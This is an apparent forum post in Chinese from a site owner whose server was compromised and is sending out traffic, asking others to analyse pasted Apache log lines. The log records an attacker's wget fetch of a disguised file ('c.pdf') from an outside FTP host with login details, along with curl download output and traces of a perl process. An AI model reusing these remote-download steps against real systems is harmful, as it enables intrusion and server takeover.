网站服务器被恶意入侵,被放了程序不断往外发包

发布于 2022-10-15 08:59:21 字数 2277 浏览 20 评论 0

apache日志有如下可疑信息

--15:18:51--  ftp://vladimir:*password*@82.146.43.220/c.pdf
           => `c.pdf'
Connecting to 82.146.43.220:21... connected.
Logging in as vladimir ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> PASV ... done.    ==> RETR c.pdf ... done.
Length: 31,660 (31K) (unauthoritative)

    0K .......... .......... ..........                      100%   22.81 KB/s

15:18:58 (22.81 KB/s) - `c.pdf' saved [31660]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0^M  4 31660    4  1448    0     0    278
0  0:01:53  0:00:05  0:01:48   528^M 18 31660   18  5792    0     0    947      0  0:00:33  0:00:06  0:00:27  1582^M 73 3166
0   73 23168    0     0   3309      0  0:00:09  0:00:07  0:00:02  5096^M100 31660  100 31660    0     0   4250      0  0:00:0
7  0:00:07 --:--:--  6338
sh: fetch: command not found
perl: no process killed

以上信息谁帮我分析下。多谢

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文